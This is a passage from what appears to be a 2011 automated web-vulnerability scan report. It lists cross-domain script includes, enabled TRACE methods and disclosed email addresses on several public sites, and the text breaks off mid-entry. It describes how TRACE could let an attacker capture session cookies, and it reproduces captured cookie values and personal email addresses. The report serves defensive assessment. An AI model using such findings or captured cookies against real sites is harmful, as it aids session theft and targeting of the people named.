Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:27 GMT
Connection: close
Content-Type: text/html
Content-Length: 40276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="ht
...[SNIP]...
<!-- Begin Marketo Munchkin Tracker -->
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.36. http://www.softlayer.com/press  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /press

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:28 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:28 GMT
Connection: close
Content-Type: text/html
Content-Length: 76287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/press/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.37. http://www.softlayer.com/resources/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /resources/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /resources/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:22 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:22 GMT
Connection: close
Content-Type: text/html
Content-Length: 23896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/resources/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.38. http://www.softlayer.com/resources/mobile-apps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /resources/mobile-apps/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /resources/mobile-apps/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:21 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:21 GMT
Connection: close
Content-Type: text/html
Content-Length: 24909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/resources/mobile-apps/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.39. http://www.softlayer.com/sitemap/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /sitemap/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sitemap/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:29 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 27263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/sitemap/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.40. http://www.softlayer.com/solutions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /solutions/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /solutions/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:26 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:26 GMT
Connection: close
Content-Type: text/html
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/solutions/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.41. http://www.softlayer.com/specials/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /specials/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /specials/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:29 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 20444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/specials/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.42. http://www.softlayer.com/virtualization/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /virtualization/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /virtualization/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 22859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/virtualization/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.43. http://www.stumbleupon.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 10210
Date: Wed, 06 Jul 2011 11:21:19 GMT
Age: 0
Via: 1.1 varnish
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<![endif]-->
       
       
           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110701-00"></script>
...[SNIP]...
</div>
   <script src="http://connect.facebook.net/en_US/all.js#appId=8ab252785ffd2ebc69f34b48c78a931d&xfbml=1&status=1&cookie=1"></script>
   <script src="http://cdn.stumble-upon.com/js/facebook_connect.js?v=20110701-00"></script>
...[SNIP]...
<!-- end wrapper -->

   <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110701-00"></script>
...[SNIP]...
14.44. http://www.stumbleupon.com/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /login.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login.php HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 9553
Date: Wed, 06 Jul 2011 11:21:20 GMT
Age: 0
Via: 1.1 varnish
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<![endif]-->
       
       
           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110701-00"></script>
...[SNIP]...
</div>
   <script src="http://connect.facebook.net/en_US/all.js#appId=8ab252785ffd2ebc69f34b48c78a931d&xfbml=1&status=1&cookie=1"></script>
   <script src="http://cdn.stumble-upon.com/js/facebook_connect.js?v=20110701-00"></script>
...[SNIP]...
<!-- end wrapper -->

   <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110701-00"></script>
...[SNIP]...
14.45. http://www.stumbleupon.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /submit?url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=189632489.866859479.1307275364.1307275364.1307312449.2; __utmv=189632489.|1=user_class=v=1,; su_conf=cfcd208495d565ef66e7dff9f98764da

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 48987
Date: Wed, 06 Jul 2011 11:15:24 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<![endif]-->
       
       
           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110701-00"></script>
...[SNIP]...
<!-- end wrapper -->

   <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110701-00"></script>
...[SNIP]...
14.46. http://www.texotela.co.uk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.texotela.co.uk
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.texotela.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:47 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4043
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>::TexoTela:: </title>
<style type="te
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script>
...[SNIP]...
<!-- Include the Google Friend Connect javascript library. -->
<script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
14.47. http://www.texotela.co.uk/code/jquery/newsticker/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.texotela.co.uk
Path:   /code/jquery/newsticker/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /code/jquery/newsticker/ HTTP/1.1
Host: www.texotela.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:48 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 5859
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>::TexoTela:: jQuery - newsticker</tit
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
14.48. http://www.tudou.com/v/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tudou.com
Path:   /v/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v/ HTTP/1.1
Host: www.tudou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: tws0.3
Date: Wed, 06 Jul 2011 14:04:04 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tudou=07290da15c4a46bcc3b820765334a527; path=/; domain=.tudou.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13738

357c
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" dir="ltr">
<head>
   <meta http-equ
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.tudouui.com/js/lib/tuilib_76.js"></script>
...[SNIP]...
14.49. http://www.zune.net/en-US/support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/support

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en-US/support HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:02 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 46329


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
</div><script src="http://siterecruit.comscore.com/sr/zune/broker.js"></script>
...[SNIP]...
14.50. http://www.zune.net/en-US/support/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/support/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en-US/support/ HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:05:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S501
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:05:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 46375


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
</div><script src="http://siterecruit.comscore.com/sr/zune/broker.js"></script>
...[SNIP]...
14.51. http://zuneinsider.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://zuneinsider.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: zuneinsider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:08 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://zuneinsider.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile
...[SNIP]...
<![endif]-->         <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js?ver=1.3.2'></script>
...[SNIP]...
<p><script src="http://player.wizzard.tv/player/o/j/x/130955714710/config/k-464b5632d758bfe2/uuid/root/height/175/width/300/episode/k-0b1c78c2c985f196.m4v" type="text/javascript"></script>
...[SNIP]...
<p><script src="http://player.wizzard.tv/player/o/j/x/130835638984/config/k-464b5632d758bfe2/uuid/root/height/175/width/300/episode/k-bf810eb2f0a26423.m4v" type="text/javascript"></script>
...[SNIP]...
<div class="textwidget"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div class="textwidget"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
15. TRACE method is enabled  previous  next
There are 2 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

15.1. http://widgets.digg.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: widgets.digg.com
Cookie: d12660513b5eb025

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:55:05 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: d12660513b5eb025; traffic_control=f04100000060110000168986608%3A219%3A112; d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2
Accept-Encoding: gzip
Host: w.digg.com
x-cdn: Requested by Cotendo
X-Fo
...[SNIP]...
15.2. http://www.stumbleupon.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stumbleupon.com
Cookie: a323be4dbcb3777d

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Host
Content-Type: message/http
Content-Length: 652
Date: Wed, 06 Jul 2011 11:15:25 GMT
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Cookie: a323be4dbcb3777d; su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=
...[SNIP]...
16. Email addresses disclosed  previous  next
There are 33 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

16.1. http://techflash.com/about.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://techflash.com
Path:   /about.html

Issue detail

The following email address was disclosed in the response:

Request

GET /about.html HTTP/1.1
Host: techflash.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-399196261-1309960828609; s_pers=%20s_vnum%3D1312552828670%2526vn%253D1%7C1312552828670%3B%20s_lv%3D1309960845575%7C1404568845575%3B%20s_lv_s%3DFirst%2520Visit%7C1309962645575%3B%20s_dslv%3DFirst%2520Visit%7C1310565645579%3B%20s_p12%3DFirst%2520Visit%7C1310565645581%3B%20s_invisit%3Dtrue%7C1309962645583%3B; s_sess=%20s_ria%3Dflash%252010%257Csilverlight%2520not%2520detected%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:01:12 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49181


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<t
...[SNIP]...
<a href="greglamm@bizjournals.com">
...[SNIP]...
16.2. http://w.sharethis.com/button/buttons.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /button/buttons.js

Issue detail

The following email address was disclosed in the response:

Request

GET /button/buttons.js HTTP/1.1
Host: w.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx?CMP=home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==
If-None-Match: "320f3-acc9-4a6cf6cc2f600"
If-Modified-Since: Wed, 29 Jun 2011 01:08:40 GMT

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 30 Jun 2011 01:37:27 GMT
ETag: "22eb1-b3ad-4a6e3f18a43c0"
Accept-Ranges: bytes
Content-Length: 45997
Content-Type: application/javascript
Date: Thu, 07 Jul 2011 00:00:57 GMT
Connection: close
Vary: Accept-Encoding

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
lse};stLight.onReady=function(){stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.log("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b="share4x";if(switchTo5x){b="share5x"}if(stLight.hasButtonOnPage()){if(stLight.loadedFromBar){if(switchTo5x){b="bar_share5x"}else{b="bar_share4x"}}}else{if(stLight.loadedFromBar){b=
...[SNIP]...
16.3. http://www.beautyoftheweb.com/combres.axd/siteJs/-1234531867/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beautyoftheweb.com
Path:   /combres.axd/siteJs/-1234531867/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /combres.axd/siteJs/-1234531867/ HTTP/1.1
Host: www.beautyoftheweb.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate, max-age=2578057
Content-Length: 1134547
Content-Type: application/x-javascript
Expires: Fri, 05 Aug 2011 11:46:32 GMT
Last-Modified: Wed, 06 Jul 2011 11:46:32 GMT
ETag: "-1234531867"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:38:54 GMT

/** * SWFAddress 2.4: Deep linking for Flash and Ajax <http://www.asual.com/swfaddress/> * * SWFAddress is (c) 2006-2009 Rostislav Hristov and contributors * This software is released under the MI
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function (name, value, options) {
